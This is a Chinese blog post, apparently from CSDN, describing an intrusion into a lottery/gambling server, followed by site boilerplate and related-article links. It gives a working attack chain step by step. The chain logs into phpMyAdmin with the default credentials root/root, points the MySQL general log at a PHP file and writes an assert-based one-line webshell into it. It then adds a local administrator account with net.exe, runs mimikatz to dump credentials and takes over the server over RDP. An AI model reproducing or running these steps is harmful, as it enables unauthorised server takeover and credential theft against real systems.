渗透系列之打击彩票站

最新推荐文章于 2023-11-19 20:17:05 发布
最新推荐文章于 2023-11-19 20:17:05 发布
阅读量4.9k 收藏 37
点赞数 4
分类专栏: Web渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39997829/article/details/109186917
版权

渗透系列之打击彩票站

By;梭哈王

  1. 获取phpmyadmin弱口令

通过信息收集到彩票站点的ip为xxx,探测扫描发现存在phpmyadmin,通过猜测,使用默认弱口令(root/root)登入到phpmyadmin当中。

 

 

 

  1. 通过phpmyadmin后台sql查询写入shell到日志文件

使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。

流程如下:

 

命令如下:

1、开启日志功能:set global general_log=on;

2、点击phpmyadmin变量查看日志文件名字:

 

这里的日志文件是test.php。

 

3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>';

4、执行成功返回。

 

 

5、查看日志文件。

 

3、菜刀连接添加用户并且上传mimikatz。

使用菜刀连接日志文件木马,xxx/test.php 密码:test

 

查看发现是系统管理员sysytem权限,直接添加用户且添加到管理组即可。

命令为: C:\Windows\system32\net.exe user Test Test!@#123 /add

C:\Windows\system32\net.exe  localgroup administrators Test /add

 

上传mimikataz到服务器当中。

 

 

4、3389连接,读取管理员密码。

1、直接telnet ip 3389 测试发现可通,于是直接连接3389进去。

 

2、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。

第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程

第二步: netstat -ano | findstr ****  //查看远程桌面服务进程号对应的端口号。

 

3、执行mimikatz,读取到管理员组登录密码。

 

 

4、使用获取的administrator/xxxx账户密码远程登入服务器当中。

 

  1. 发现该服务器使用phpmystudy批量建立彩票站,大概有十几个站点,随意访问几个服务器上的网站域名,部分截图如下:

 

系统一:

 

系统二:

 

 

 

系统三:

 

 

后台一:

 

后台二:

 

安全大哥
关注
  • 4
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 16
    评论
专栏目录
实操教程:黑客如何瞄准和入侵网站
jklbnm12的博客
06-27 4807
这个问题的答案可能很难确定,仅仅是因为有很多方法可以入侵一个网站。我们在本文中的目的是向您展示黑客在定位和入侵您的网站时最常用的技术! 假设这是您的点:hack-test.com 让我们ping这个点来获取服务器IP: 现在我们有 173.236.138.113 - 这是我们的目标点托管的服务器 IP。 要查找托管在同一服务器上的其他点,我们将使用 sameip.org: 托管在 IP 地址 173.236.138.113 上的相同 IP 26 点 ID 领域 网站链接 我们需要有关您网站的更多
渗透测试技术之本地文件包含
02-25
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
爬取彩票相关信息
半吊子python全栈
03-24 3357
        简单说一下,我找的一个网站是kaijiang.500.com/ 下的双色球,数据是从03年第一期一直到现在都有,虽然每次都只能网页上拿一期的数据,但是反爬虫措施不强,可以很快就爬完。        我是利用了MongoDB和scrapy,这个轮子对初学者还好吧,但是用时间长了也会发现很多不足,然后就可以考虑自己造轮子了。如果是直接使用request写,更简单~具体代码如下:# -*...
【备忘】记录一次网站被黑,被挂载木马,访问首页跳转博网站经历
qq_15941409的博客
04-08 749
现象: 早上一上班,接到通知说网站打不开了,运维妹纸说让我处理一下,一脸懵逼的我开始慢慢和她交流,然后理出她的问题。 具体问题是说网站ip被冻结了,这是妹纸提了工单,华为云安全工程师告知的结果,说是网站被黑挂了木马。 这位老师傅态度很好,点个赞。 现在知道问题和现象了,还是有点懵逼的我要来账号密码开始处理,但是登陆不了,冻结了嘛,只能通过华为云控制台进入操作。 so.解决步骤: 查看Nginx配置文件nginx.conf 找到网站虚拟机配置文件 把网站绑定的域名随便修改一个,相当于对应域
黑客入侵步骤(超详细版)
2201_75362610的博客
03-10 4709
黑客的事迹听得多了,但你是否了解,入侵一台计算机到底是怎么一回事呢?电影的片段太炫,不足以相信,而报章的报导又往往过于片面,因此不了解网络架构者,很难想象黑客的行为。现在就让分析家苗苗为你披露一些最基本的“入侵程序”,当然这些微不足道的伎俩难以骇进真正的网络,不过至少让你对黑客的“工作情形”有粗浅的认识,以后要建立保安系统,也知道该从何着手。黑客确定目标,就像小偷确定要潜入那间倒霉的住家一般,是所有入侵行动的第一步。通常黑客侵入一个网站,都有特定的目的,如获得用户信用卡资料,以进行商业犯罪。
彩票漏洞引发的软件测试漏测思考
weixin_34097242的博客
07-03 2272
背景信息:央视:彩票的惊天秘密,主利用漏洞中奖2800万,2011年11月24日...本案例的主人公利用漏洞,知道中奖号码后在买,5分钟漏洞造就2800万神话,数千次兑奖福未察觉。   看到这个新闻,不由得让从事软件测试的我们引发很多思考,从某种意义上来说,我不得不佩服这个主的思维方式,很显然的是,整个福的软硬件系统肯定是经过相对严格的软件测试...
实战一次完整的博渗透测试
m0_60571990的博客
11-15 5579
实战一次完整的博渗透测试
学完渗透赌博网站,从零基础到实战的Web渗透学习路线+手册
WANGJUNAIJIAO的博客
09-07 384
大家都知道IT是一个非常复杂和混沌的领域,充斥着各种已经半死不活的过时技术和数量更多的新系统、新软件和新协议。保护现在的企业网络不能仅仅依靠补丁管理、防火墙和用户培训,而更需要周期性地对网络中的安全防御机制进行真实环境下的验证与评估,以确定哪些是有效的哪些是缺失的,而这就是渗透测试所要完成的目标。渗透测试是一- 项非常具有挑战性的工作。你拿着客户付的钱,却像犯罪者那样去思考,使用你所掌握的各种“游击”战术,在一个高度复杂的防御网络中找出最为薄弱的环节,来实施致命一击。
怎么简单快速一个钟头入侵网站
资料汇总整理-仅供个人学习使用
06-10 4万+
首先,观察指定网站。 入侵指定网站是需要条件的: 要先观察这个网站是动态还是静态的。  首先介绍下什么样点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的点 如果是静态的(.htm或html),一般是不会成功的。 如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。  Quote: 以下是入侵网站常用方法:  1.上传漏洞 如果看到:选择你要上传的文件
web渗透系列教学下载共64份.zip
12-30
web渗透系列教学下载共64份: 内容如下; web渗透--1--web安全原则.pdf web渗透--10--不安全的HTTP方法.pdf web渗透--11--登录认证安全测试.pdf web渗透--12--浏览器缓存攻击测试.pdf web渗透--13--目录遍历文件包含...
2020首发大富双盘独家修复开奖与采集+WAP+WEB(完整版)
09-08
服务器环境:Win2008R2(推荐)+ 宝塔或其它集成环境 + 一级域名1个 程序运行环境 :阿帕奇2.4+PHP5.6(或者PHP5.4)+Mysql5.5 (推荐phpsduty集成环境) 服务器推荐配置:4G以上 4核处理器 带宽5M(否则可能无法运行) 注意:宝塔 搭建请自行修改伪静态否则无法打开 搭建教程:安装集成环境 + 安装运行环境 + 绑定域名 + 上传源码 + 导入数据库 导入数据库:data.sql
内网渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
渗透测试之信息收集1
08-04
渗透测试之信息收集1 渗透测试中,信息收集是非常重要的一步骤,因为只有我们掌握了目标网站或目标主机足够多的信息之后,我们才能更好地对其进行漏洞检测。 信息收集可以分为两种方式:主动和被动。主动信息收集...
php开发彩票聊天室教程,用PHP和ACCESS写聊天室(五)_PHP教程
weixin_33215027的博客
04-01 535
member.php3 :新建房间出错请重新新建【系统消息】".$rArr[1]."这个坏蛋被踢出了这个聊天室:-)', False, 0)");}}else{if ($sKick=="0" || $sKick==$id) $bCanKick="2";else $bCanKick="1";$result=@odbc_exec($ConnID,"SELECT MasterID FROM Room W...
【实用教程】大富增加系统教程/超详细的教程文档,菜鸡根据教程都可以百分百可以上手
简单记录生活
07-01 1346
【实用教程】大富增加系统教程/超详细的教程文档,菜鸡根据教程都可以百分百可以上手
刚入门小黑客记一次对某点的渗透测试(bypass)
kjuhfkicf154的博客
01-31 1418
渗透已授权。非授权渗透是违法行为!
记一次渗透测试实战
qq_45434762的博客
11-17 1334
免责声明 本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。 因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与NowSec及分享者无关 0.起因 博主从周一到周五一直在收同一个公司发送的垃圾短信(这从短信链接中的域名可以看出),但是当博主点进网页看的时候,发现这是可以说是一家骗子网站吧。网站所卖的东西...
棋牌网站实战渗透
最新发布
m0_71953083的博客
11-19 1077
某棋牌网站后台渗透实战。
越权漏洞系列
热门推荐
Websec
04-02 4万+
0x01:越权的定义越权漏洞是我们在测试过程中遇到比较多的漏洞,我们可以这样来理解越权漏洞,一个用户A一般只能够对自己本身的信息进行增删改查,然而由于后台开发人员的疏忽,没有在信息进行增删改查时候进行用户判断,从而导致用户A可以对其他用户进行增删改查等等操作。当然越权漏洞的话,分为水平越权和垂直越权。0x01:水平越权:也可以把其称作访问控制攻击漏洞.Web应用程序在接收到用户的请求时,我们在增删...
kali linux 渗透测试系列
07-31
Kali Linux是一个由Offensive Security维护的基于Debian的系统,内含有渗透测试工具集,受到世界安全专家的青睐,也是新手入门的很好的选择。它是一个专门用于网络安全渗透测试的操作系统,提供了丰富的工具和资源,用于评估和测试网络的安全性。Kali Linux的安装过程相对简单,也有很多教程可供参考。如果你对Kali Linux渗透测试系列感兴趣,可以查看作者南城无笙的网络安全-渗透测试-Kali Linux教程系列篇,该系列文章详细介绍了Kali Linux的使用和相关工具的应用。[1][2][3]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值